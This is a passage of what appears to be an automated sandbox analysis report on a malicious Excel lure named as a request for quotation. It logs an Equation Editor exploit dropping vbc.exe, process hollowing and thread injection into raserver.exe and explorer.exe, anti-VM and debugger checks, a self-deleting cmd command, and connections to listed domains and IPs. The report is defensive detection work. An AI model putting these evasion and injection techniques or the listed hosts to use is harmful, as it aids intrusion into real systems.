        Source: C:\Users\Public\vbc.exeCode function: 7_2_00A41D80 NtSuspendThread,7_2_00A41D80
        Source: C:\Users\Public\vbc.exeCode function: 7_2_00A3FD5C NtEnumerateKey,7_2_00A3FD5C
        Source: C:\Users\Public\vbc.exeCode function: 7_2_00A3FE24 NtWriteVirtualMemory,7_2_00A3FE24
        Source: C:\Users\Public\vbc.exeCode function: 7_2_00A3FFFC NtCreateProcessEx,7_2_00A3FFFC
        Source: C:\Users\Public\vbc.exeCode function: 7_2_00A3FF34 NtQueueApcThread,7_2_00A3FF34
        Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_01EE00C4 NtCreateFile,LdrInitializeThunk,9_2_01EE00C4
        Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_01EE07AC NtCreateMutant,LdrInitializeThunk,9_2_01EE07AC
        Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_01EDF9F0 NtClose,LdrInitializeThunk,9_2_01EDF9F0
        Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_01EDF900 NtReadFile,LdrInitializeThunk,9_2_01EDF900
        Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_01EDFBB8 NtQueryInformationToken,LdrInitializeThunk,9_2_01EDFBB8
        Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_01EDFB68 NtFreeVirtualMemory,LdrInitializeThunk,9_2_01EDFB68
        Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_01EDFB50 NtCreateKey,LdrInitializeThunk,9_2_01EDFB50
        Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_01EDFAE8 NtQueryInformationProcess,LdrInitializeThunk,9_2_01EDFAE8
        Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_01EDFAD0 NtAllocateVirtualMemory,LdrInitializeThunk,9_2_01EDFAD0
        Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_01EDFAB8 NtQueryValueKey,LdrInitializeThunk,9_2_01EDFAB8
        Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_01EDFDC0 NtQuerySystemInformation,LdrInitializeThunk,9_2_01EDFDC0
        Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_01EDFD8C NtDelayExecution,LdrInitializeThunk,9_2_01EDFD8C
        Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_01EDFC60 NtMapViewOfSection,LdrInitializeThunk,9_2_01EDFC60
        Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_01EDFFB4 NtCreateSection,LdrInitializeThunk,9_2_01EDFFB4
        Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_01EDFED0 NtAdjustPrivilegesToken,LdrInitializeThunk,9_2_01EDFED0
        Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_01EE01D4 NtSetValueKey,9_2_01EE01D4
        Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_01EE1148 NtOpenThread,9_2_01EE1148
        Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_01EE010C NtOpenDirectoryObject,9_2_01EE010C
        Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_01EE10D0 NtOpenProcessToken,9_2_01EE10D0
        Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_01EE0060 NtQuerySection,9_2_01EE0060
        Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_01EE0078 NtResumeThread,9_2_01EE0078
        Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_01EE0048 NtProtectVirtualMemory,9_2_01EE0048
        Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_01EDF938 NtWriteFile,9_2_01EDF938
        Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_01EE1930 NtSetContextThread,9_2_01EE1930
        Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_01EDF8CC NtWaitForSingleObject,9_2_01EDF8CC
        Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_01EDFBE8 NtQueryVirtualMemory,9_2_01EDFBE8
        Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_01EDFA50 NtEnumerateValueKey,9_2_01EDFA50
        Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_01EDFA20 NtQueryInformationFile,9_2_01EDFA20
        Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_01EE1D80 NtSuspendThread,9_2_01EE1D80
        Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_01EDFD5C NtEnumerateKey,9_2_01EDFD5C
        Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_01EDFC90 NtUnmapViewOfSection,9_2_01EDFC90
        Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_01EDFC48 NtSetInformationFile,9_2_01EDFC48
        Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_01EE0C40 NtGetContextThread,9_2_01EE0C40
        Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_01EDFC30 NtOpenProcess,9_2_01EDFC30
        Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_01EDFFFC NtCreateProcessEx,9_2_01EDFFFC
        Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_01EDFF34 NtQueueApcThread,9_2_01EDFF34
        Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_01EDFEA0 NtReadVirtualMemory,9_2_01EDFEA0
        Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_01EDFE24 NtWriteVirtualMemory,9_2_01EDFE24
        Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_000981B0 NtCreateFile,9_2_000981B0
        Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_00098260 NtReadFile,9_2_00098260
        Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_000982E0 NtClose,9_2_000982E0
        Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_00098390 NtAllocateVirtualMemory,9_2_00098390
        Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_000981B4 NtCreateFile,9_2_000981B4
        Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_0009825B NtReadFile,9_2_0009825B
        Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_000982DA NtClose,9_2_000982DA
        Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_0226632E NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtUnmapViewOfSection,NtClose,9_2_0226632E
        Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_022667C7 NtQueryInformationProcess,RtlWow64SuspendThread,NtSetContextThread,NtQueueApcThread,NtResumeThread,9_2_022667C7
        Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_02266332 NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,9_2_02266332
        Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_022667C2 NtQueryInformationProcess,9_2_022667C2
        Source: C:\Users\Public\vbc.exeMemory allocated: 76F90000 page execute and read and writeJump to behavior
        Source: C:\Users\Public\vbc.exeMemory allocated: 76E90000 page execute and read and writeJump to behavior
        Source: C:\Users\Public\vbc.exeMemory allocated: 76F90000 page execute and read and writeJump to behavior
        Source: C:\Users\Public\vbc.exeMemory allocated: 76E90000 page execute and read and writeJump to behavior
        Source: C:\Windows\SysWOW64\raserver.exeMemory allocated: 76F90000 page execute and read and writeJump to behavior
        Source: C:\Windows\SysWOW64\raserver.exeMemory allocated: 76E90000 page execute and read and writeJump to behavior
        Source: vbc[1].exe.4.drStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
        Source: vbc.exe.4.drStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
        Source: (RFQ) No.109050.xlsxReversingLabs: Detection: 34%
        Source: C:\Users\Public\vbc.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
        Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
        Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
        Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
        Source: C:\Users\Public\vbc.exeProcess created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exe
        Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\raserver.exe C:\Windows\SysWOW64\raserver.exe
        Source: C:\Windows\SysWOW64\raserver.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\Public\vbc.exe'
        Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe' Jump to behavior
        Source: C:\Users\Public\vbc.exeProcess created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exeJump to behavior
        Source: C:\Windows\SysWOW64\raserver.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\Public\vbc.exe'Jump to behavior
        Source: C:\Windows\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{C90250F3-4D7D-4991-9B69-A5C5BC1C2AE6}\InProcServer32Jump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\Desktop\~$(RFQ) No.109050.xlsxJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\CVREE15.tmpJump to behavior
        Source: classification engineClassification label: mal100.troj.expl.evad.winXLSX@9/19@5/5
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
        Source: C:\Users\Public\vbc.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dllJump to behavior
        Source: explorer.exe, 00000008.00000000.499513895.0000000002AE0000.00000002.00020000.sdmpBinary or memory string: .VBPud<_
        Source: vbc[1].exe.4.dr, Forms/mainForm.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
        Source: vbc.exe.4.dr, Forms/mainForm.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
        Source: 6.2.vbc.exe.330000.1.unpack, Forms/mainForm.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
        Source: 6.0.vbc.exe.330000.0.unpack, Forms/mainForm.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
        Source: 7.0.vbc.exe.330000.0.unpack, Forms/mainForm.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
        Source: 7.2.vbc.exe.330000.1.unpack, Forms/mainForm.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
        Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
        Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
        Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
        Source: Window RecorderWindow detected: More than 3 window changes detected
        Source: C:\Users\Public\vbc.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItemsJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
        Source: Binary string: RAServer.pdb^ source: vbc.exe, 00000007.00000002.518168401.00000000002A0000.00000040.00020000.sdmp
        Source: Binary string: wntdll.pdb source: vbc.exe, raserver.exe
        Source: Binary string: RAServer.pdb source: vbc.exe, 00000007.00000002.518168401.00000000002A0000.00000040.00020000.sdmp

        Data Obfuscation:

        barindex
        .NET source code contains potential unpackerShow sources
        Source: vbc[1].exe.4.dr, Forms/mainForm.cs.Net Code: _X_X0FT_FT2 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
        Source: vbc.exe.4.dr, Forms/mainForm.cs.Net Code: _X_X0FT_FT2 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
        Source: 6.2.vbc.exe.330000.1.unpack, Forms/mainForm.cs.Net Code: _X_X0FT_FT2 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
        Source: 6.0.vbc.exe.330000.0.unpack, Forms/mainForm.cs.Net Code: _X_X0FT_FT2 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
        Source: 7.0.vbc.exe.330000.0.unpack, Forms/mainForm.cs.Net Code: _X_X0FT_FT2 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
        Source: 7.2.vbc.exe.330000.1.unpack, Forms/mainForm.cs.Net Code: _X_X0FT_FT2 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
        Source: C:\Users\Public\vbc.exeCode function: 6_2_001D950F push edi; iretd 6_2_001D9510
        Source: C:\Users\Public\vbc.exeCode function: 7_2_004070F2 push CB9B4C56h; iretd 7_2_004070F7
        Source: C:\Users\Public\vbc.exeCode function: 7_2_004158FC pushfd ; retf 7_2_004158FF
        Source: C:\Users\Public\vbc.exeCode function: 7_2_0041B3F2 push eax; ret 7_2_0041B3F8
        Source: C:\Users\Public\vbc.exeCode function: 7_2_0041B3FB push eax; ret 7_2_0041B462
        Source: C:\Users\Public\vbc.exeCode function: 7_2_0041B3A5 push eax; ret 7_2_0041B3F8
        Source: C:\Users\Public\vbc.exeCode function: 7_2_0041B45C push eax; ret 7_2_0041B462
        Source: C:\Users\Public\vbc.exeCode function: 7_2_00415436 pushad ; retf 7_2_00415437
        Source: C:\Users\Public\vbc.exeCode function: 7_2_00415CBF push ds; iretd 7_2_00415CC4
        Source: C:\Users\Public\vbc.exeCode function: 7_2_00A4DFA1 push ecx; ret 7_2_00A4DFB4
        Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_01EEDFA1 push ecx; ret 9_2_01EEDFB4
        Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_000958FC pushfd ; retf 9_2_000958FF
        Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_000870F2 push CB9B4C56h; iretd 9_2_000870F7
        Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_0009B3A5 push eax; ret 9_2_0009B3F8
        Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_0009B3FB push eax; ret 9_2_0009B462
        Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_0009B3F2 push eax; ret 9_2_0009B3F8
        Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_00095436 pushad ; retf 9_2_00095437
        Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_0009B45C push eax; ret 9_2_0009B462
        Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_00095CBF push ds; iretd 9_2_00095CC4
        Source: vbc[1].exe.4.drStatic PE information: 0x9EDDC985 [Wed Jun 17 18:52:53 2054 UTC]
        Source: initial sampleStatic PE information: section name: .text entropy: 7.15286878392
        Source: initial sampleStatic PE information: section name: .text entropy: 7.15286878392
        Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exeJump to dropped file
        Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file
        Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file

        Boot Survival:

        barindex
        Drops PE files to the user root directoryShow sources
        Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\raserver.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

        Malware Analysis System Evasion:

        barindex
        Yara detected AntiVM3Show sources
        Source: Yara matchFile source: 00000006.00000002.476810740.00000000024EC000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: vbc.exe PID: 2028, type: MEMORYSTR
        Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)Show sources
        Source: vbc.exe, 00000006.00000002.476810740.00000000024EC000.00000004.00000001.sdmpBinary or memory string: WINE_GET_UNIX_FILE_NAME
        Source: vbc.exe, 00000006.00000002.476810740.00000000024EC000.00000004.00000001.sdmpBinary or memory string: SBIEDLL.DLL
        Tries to detect virtualization through RDTSC time measurementsShow sources
        Source: C:\Users\Public\vbc.exeRDTSC instruction interceptor: First address: 00000000004085E4 second address: 00000000004085EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
        Source: C:\Users\Public\vbc.exeRDTSC instruction interceptor: First address: 000000000040896E second address: 0000000000408974 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
        Source: C:\Windows\SysWOW64\raserver.exeRDTSC instruction interceptor: First address: 00000000000885E4 second address: 00000000000885EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
        Source: C:\Windows\SysWOW64\raserver.exeRDTSC instruction interceptor: First address: 000000000008896E second address: 0000000000088974 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
        Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2852Thread sleep time: -300000s >= -30000sJump to behavior
        Source: C:\Users\Public\vbc.exe TID: 3036Thread sleep time: -39025s >= -30000sJump to behavior
        Source: C:\Users\Public\vbc.exe TID: 2964Thread sleep time: -922337203685477s >= -30000sJump to behavior
        Source: C:\Windows\SysWOW64\raserver.exe TID: 2012Thread sleep time: -32000s >= -30000sJump to behavior
        Source: C:\Windows\explorer.exeLast function: Thread delayed
        Source: C:\Windows\SysWOW64\raserver.exeLast function: Thread delayed
        Source: C:\Users\Public\vbc.exeCode function: 7_2_004088A0 rdtsc 7_2_004088A0
        Source: C:\Users\Public\vbc.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: C:\Users\Public\vbc.exeProcess information queried: ProcessInformationJump to behavior
        Source: C:\Users\Public\vbc.exeThread delayed: delay time: 39025Jump to behavior
        Source: C:\Users\Public\vbc.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: explorer.exe, 00000008.00000000.488903396.0000000000255000.00000004.00000020.sdmpBinary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
        Source: explorer.exe, 00000008.00000000.484440304.000000000457A000.00000004.00000001.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\5&22BE343F&0&000000
        Source: vbc.exe, 00000006.00000002.476810740.00000000024EC000.00000004.00000001.sdmpBinary or memory string: vmware
        Source: explorer.exe, 00000008.00000000.491890159.000000000449C000.00000004.00000001.sdmpBinary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0P
        Source: vbc.exe, 00000006.00000002.476810740.00000000024EC000.00000004.00000001.sdmpBinary or memory string: C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
        Source: vbc.exe, 00000006.00000002.476810740.00000000024EC000.00000004.00000001.sdmpBinary or memory string: SOFTWARE\VMware, Inc.\VMware Tools
        Source: explorer.exe, 00000008.00000000.484440304.000000000457A000.00000004.00000001.sdmpBinary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0
        Source: vbc.exe, 00000006.00000002.476810740.00000000024EC000.00000004.00000001.sdmpBinary or memory string: VMWARE
        Source: vbc.exe, 00000006.00000002.476810740.00000000024EC000.00000004.00000001.sdmpBinary or memory string: InstallPath%C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
        Source: explorer.exe, 00000008.00000000.539206634.000000000029B000.00000004.00000020.sdmpBinary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0*N
        Source: explorer.exe, 00000008.00000000.492529993.00000000045D6000.00000004.00000001.sdmpBinary or memory string: \\?\ide#cdromnecvmwar_vmware_sata_cd01_______________1.00____#6&373888b8&0&1.0.0#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
        Source: vbc.exe, 00000006.00000002.476810740.00000000024EC000.00000004.00000001.sdmpBinary or memory string: VMWARE"SOFTWARE\VMware, Inc.\VMware ToolsLHARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Scsi Bus 0\Target Id 0\Logical Unit Id 0LHARDWARE\DEVICEMAP\Scsi\Scsi Port 2\Scsi Bus 0\Target Id 0\Logical Unit Id 0'SYSTEM\ControlSet001\Services\Disk\Enum
        Source: vbc.exe, 00000006.00000002.476810740.00000000024EC000.00000004.00000001.sdmpBinary or memory string: VMware SVGA II
        Source: vbc.exe, 00000006.00000002.476810740.00000000024EC000.00000004.00000001.sdmpBinary or memory string: vmwareNSYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000
        Source: C:\Users\Public\vbc.exeCode function: 7_2_004088A0 rdtsc 7_2_004088A0
        Source: C:\Users\Public\vbc.exeProcess token adjusted: DebugJump to behavior
        Source: C:\Windows\SysWOW64\raserver.exeProcess token adjusted: DebugJump to behavior
        Source: C:\Users\Public\vbc.exeCode function: 7_2_00A526F8 mov eax, dword ptr fs:[00000030h]7_2_00A526F8
        Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_01EF26F8 mov eax, dword ptr fs:[00000030h]9_2_01EF26F8
        Source: C:\Users\Public\vbc.exeProcess queried: DebugPortJump to behavior
        Source: C:\Windows\SysWOW64\raserver.exeProcess queried: DebugPortJump to behavior
        Source: C:\Users\Public\vbc.exeCode function: 7_2_00409B10 LdrLoadDll,7_2_00409B10
        Source: C:\Users\Public\vbc.exeMemory allocated: page read and write | page guardJump to behavior

        HIPS / PFW / Operating System Protection Evasion:

        barindex
        System process connects to network (likely due to code injection or exploit)Show sources
        Source: C:\Windows\explorer.exeDomain query: www.corpmat.com
        Source: C:\Windows\explorer.exeNetwork Connect: 34.98.99.30 80Jump to behavior
        Source: C:\Windows\explorer.exeNetwork Connect: 144.217.61.66 80Jump to behavior
        Source: C:\Windows\explorer.exeDomain query: www.boxtobookshelf.com
        Source: C:\Windows\explorer.exeDomain query: www.hansel-design.com
        Source: C:\Windows\explorer.exeDomain query: www.aubergetoitrouge.com
        Source: C:\Windows\explorer.exeNetwork Connect: 34.102.136.180 80Jump to behavior
        Source: C:\Windows\explorer.exeNetwork Connect: 75.2.89.208 80Jump to behavior
        Source: C:\Windows\explorer.exeDomain query: www.afishin.com
        Sample uses process hollowing techniqueShow sources
        Source: C:\Users\Public\vbc.exeSection unmapped: C:\Windows\SysWOW64\raserver.exe base address: 7C0000Jump to behavior
        Maps a DLL or memory area into another processShow sources
        Source: C:\Users\Public\vbc.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
        Source: C:\Users\Public\vbc.exeSection loaded: unknown target: C:\Windows\SysWOW64\raserver.exe protection: execute and read and writeJump to behavior
        Source: C:\Users\Public\vbc.exeSection loaded: unknown target: C:\Windows\SysWOW64\raserver.exe protection: execute and read and writeJump to behavior
        Source: C:\Windows\SysWOW64\raserver.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read writeJump to behavior
        Source: C:\Windows\SysWOW64\raserver.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
        Injects a PE file into a foreign processesShow sources
        Source: C:\Users\Public\vbc.exeMemory written: C:\Users\Public\vbc.exe base: 400000 value starts with: 4D5AJump to behavior
        Queues an APC in another process (thread injection)Show sources
        Source: C:\Users\Public\vbc.exeThread APC queued: target process: C:\Windows\explorer.exeJump to behavior
        Modifies the context of a thread in another process (thread injection)Show sources
        Source: C:\Users\Public\vbc.exeThread register set: target process: 1764Jump to behavior
        Source: C:\Windows\SysWOW64\raserver.exeThread register set: target process: 1764Jump to behavior
        Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe' Jump to behavior
        Source: C:\Users\Public\vbc.exeProcess created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exeJump to behavior
